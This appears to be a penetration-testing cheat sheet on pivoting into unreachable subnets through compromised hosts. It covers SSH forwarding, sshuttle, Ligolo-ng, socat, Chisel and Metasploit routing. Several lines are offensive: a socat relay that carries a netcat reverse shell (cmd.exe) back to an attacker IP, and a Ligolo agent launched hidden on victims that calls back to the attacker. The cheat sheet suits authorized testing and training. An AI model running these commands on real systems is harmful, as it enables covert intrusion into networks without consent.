Tunnelling & Port Forwarding

Introduction

If you have found hosts on a different network that you do not have access to, you will need to use one of the compromised hosts to pivot to the subnet. For doing so, you can use the several techniques and tools that you will see in this section.

SSH

Local Port Forwarding

Use the following command if you want to access a website (port 80) on a subnet through an intermediary computer via SSH. Then, you will be able to access the website through localhost (port 8000).

ssh -L localhost:8000:<VICTIM_IP>:80 <PIVOT_USER>@<PIVOT_IP> [-fN]

The -L flag creates a link to a local port.
The -f flag is used to set SSH to the background so that we can still use our terminal.
The -N flag iindicates to SSH that we do not want to execute any commands.

Remote Port Forwarding

This allows anyone on the remote server to connect to TCP port 8080 on the remote server. The connection will then be tunnelled back to the client host, and the client then makes a TCP connection to port 80 on localhost.

ssh -R 8080:localhost:80 <PIVOT_USER>@<PIVOT_IP> [-fN]

Proxy

This command will open port 1337 on your machine as a proxy to send data to the subnet. This is useful when combined with a tool like proxychains, so you can access different ports and IPs with the same connection.

ssh -D 1337 <PIVOT_USER>@<PIVOT_IP> [-fN]

Internet access to an offline machine

You might encounter a situation where you require Internet access for downloading tools, installing packages, etc. but the machine doesn't have Internet and you only can connect through SSH with a machine with Internet access. For those cases, you can do the following:

1. Install a proxy on the machine with Internet access.

sudo apt update && sudo apt install squid -y

Modify the squid configuration by commenting all http_access deny * and add http_access allow all. Then, restart the squid server:

sudo service squid restart

2. Execute the following lines in the offline machine, thus the traffic will go through the future port forwarding.

export http_proxy=http://127.0.0.1:3129
export https_proxy=http://127.0.0.1:3129

Note: To make it permanently through all the terminals add the before-mentioned lines into the /etc/environment file.

Furthermore, if you want to use apt to install packages add the following lines into the /etc/apt/apt.conf.d/50apt-file.conf file.

Acquire::http::Proxy "http://localhost:3129";
Acquire::https::Proxy "https://localhost:3129";

3. Finally, do the port forwarding.

ssh -R 3129:localhost:3128 <USER>@<OFFILNE_HOST>

Sshuttle

Shuttle allows us to route networks through SSH tunnels as if it were a VPN.

Download Link: Link
Installation command: sudo apt install sshutle

The command to use shuttle is:

sshuttle -r <PIVOT_USER>@<PIVOT_IP> {-N | <SUBNET/X>}

The -N flag is used for sshuttle to try to guess the server's subnet.

Unfortunately, sshuttle has no shortcut to use a private key to authenticate to the SSH server. However, you can use the --ssh-cmd flag to work around this problem.

sshuttle -r <PIVOT_USER>@<PIVOT_IP> --ssh-cmd "ssh -i <PRIVATE_KEY>" {-N | <SUBNET/X>}

Nota:

You may get the following error when connecting with sshuttle: client: fatal: server died with error code 255.

This can happen when the compromised machine you connect to is part of the subnet you are trying to access. For example, if we were connecting to 172.16.0.5 and tried to forward 172.16.0.0/24, we would be including the compromised server within the newly forwarded subnet, thus breaking the connection and causing the tool to die.

To avoid this, we tell sshuttle to exclude the compromised server from the subnet range using the -x option. To use our example above:

sshuttle -r <PIVOT_USER>@<PIVOT_IP> <SUBNET/X> -x <PIVOT_IP>

Ligolo-ng

Ligolo-ng is an advanced, yet simple tunneling tool that uses TUN interfaces, allowing you to access the whole network without much of a hassle. However, it is not suitable for creating listening ports on the victims machine which connection is redirected to another machine rather than the server.

Create the tun interface.

sudo ip tuntap add user auditor mode tun ligolo
sudo ip link set ligolo up

Launch the server.

./ligo_proxy -selfcert -laddr 0.0.0.0:8080

On the victim side execute the client, pointing to the server.

# Meterpreter
execute -H -f C:\\Windows\\Tasks\\ligo_agent.exe -a "-ignore-cert -connect <YOUR_IP>:8080"

# Windows 
Start-Process -WindowStyle Hidden -FilePath "C:\Windows\Tasks\ligo_agent.exe" -ArgumentList "-ignore-cert", "-connect", "<YOUR_IP>:8080" 

# Linux
./ligo_agent -ignore-cert -connect <YOUR_IP>:<PORT> &

Go to the server's terminal and select the new session.

ligolo-ng » session
ligolo-ng » <SESSION>

Once selected the session start the tunnel.

[Agent : www-data@web05] » start

Add on the attacking machine the route you want to access

sudo ip route add <VICTIMS_NETWORK>/24 dev ligolo

Remote Port Forwarding

ℹ️ This can be useful to pivot between networks. So, victim 1 creates a Remote Port Fortwarding to ligolo proxy and then, victim 2 connects to victim 1 which is forwarded to ligolo

Select a session.
Configure the listener

listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80 --tcp

Socat

Socat is a relay for bidirectional data transfer between two independent data channels.

Download links:

Windows (x86-x64): Link
Linux (x64): Link

Reverse Shell Relay

kali@kali:$ sudo nc -lvnp 443
user@victim_ONE:$ socat tcp-l:8000 tcp:<ATTACKER_IP>:443 
user@victim_TWO:$  nc 127.0.0.1 8000 -e C:\Windows\System32\cmd.exe

tcp-l: 8000 is used to create the first half of the connection: an IPv4 tcp listening port on 8000 on the victim_ONE. The second have of the connection is when you connect to the victim_ONE machine from the victim_TWO machine.

Port Forwarding (Stealthy)

First, on our pivoting machine, we run the following command:

./socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &

This command opens two ports: 8000 and 8001, creating a local port relay. What goes into one of them will come out of the other. For this reason, port 8000 also has the fork and reuseaddr options to allow us to create more than one connection using this port going forward.

The following command establishes a connection between our listening port 8001 on the pivoting machine and the open port on the target server (80).

./socat tcp:<PIVOTING_IP>:8001 tcp:<TARGET_IP>:80,fork &

This would create a link between port 8000 on our attacking machine and port 80 on the target machine, which means we could go to localhost:8000 in the web browser of our attacking machine to load the web page served by the target.

Port Forwarding (Reverse)

In order to access the website on port 80 on the victim's machine through localhost:8080, we need to execute the following commands.

Attacking machine:

socat -v TCP-LISTEN:<PIVOTING_PORT> TCP-LISTEN:<SRC_PORT>
# Example
socat -v TCP-LISTEN:10000 TCP-LISTEN:8080

Pivoting machine:

socat TCP:<ATTACKER_IP>:<PIVOTING_PORT> TCP:localhost:<DST_PORT>
# Example
socat TCP:10.9.160.251:10000 TCP:localhost:80

Chisel

Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable, including both client and server. Written in Go.

Furthermore, Chisel is mainly useful for passing through firewalls.

Download link: Link

Reverse SOCKS Proxy

On our attacking machine, we set a port to listen (--reverse sets the port to listen.).

./chisel server -p <LISTEN_PORT> --reverse &

On the compromised host, we would use the following command, which connects to the listening port of our attacking machine, completing the proxy.

./chisel client <ATTACKER_IP>:<LISTEN_PORT> R:socks &

The flag R:socks tells the chisel server that the proxy or port forwarding will be done on the client-side.

Forwards SOCKS Proxy

The connection is made from the attacking machine to the compromised machine.

On the compromised machine we run:

./chisel server -p <LISTEN_PORT> --socks5

On the attacking machine we run::

./chisel client <TARGET_IP>:<LISTEN_PORT> CHISEL_PORT_SERVER:socks

Remote Port Forwarding

Remote Port Forward is when we connect from the compromised target machine to create port forwarding.

On the attacking machine, we use the following command:

./chisel server -p <LISTEN_PORT> --reverse &

The command to connect to the attacking machine is as follows..

./chisel client <ATTACKER_IP>:<LISTEN_PORT> R:<LOCAL_PORT>:<TARGET_IP>:<TARGET_PORT> &

Note the difference between LISTEN_PORT and LOCAL_PORT. LISTEN_PORT is the port on which we start the chisel server, and LOCAL_PORT is the port we want to open on our attacker machine to bind to the desired destination port.

Local Port Forwarding

We connect from our attacking machine to the chisel server on the compromised machine.

On the compromised machine, we create the chisel server.

./chisel server -p <LISTEN_PORT>

And now we connect from the attacking machine

./chisel client <PIVOT_IP>:<PIVOT_PORT> <LOCAL_PORT>:<TARGET_IP>:<TARGET_PORT>

For example, if you want to connect to the application on 192.168.2.4:80 through the machine 192.168.1.2, so you can access the web page accessing localhost:8080 on your machine. Execute the following commands:

# Compromissed
./chisel server -p 8081
# Attacking machine
./chisel client 192.168.1.2:8081 8080:192.168.2.4:80

Metasploit

Once we have a meterpreter session, we can use the module post/multi/manage/autoroute to pivot to a different network through the compromised machine.

use post/multi/manage/autoroute
set SESSION X
[set SUBNET <SUBNET/X>]
exploit

Then, with the module auxiliary/server/socks_proxy, we can use proxychains in order to route all our traffic.

You can use socks5 or socks 4.

ℹ️ By default, this module uses socks5 at port 1080.

# Might also work auxiliary/server/socks4a
use auxiliary/server/socks_proxy 
exploit

If you want to use socks4, you need to configure proxychains.

sudo bash -c 'echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf'

References

Internet access through SSH

Last updated 3 months ago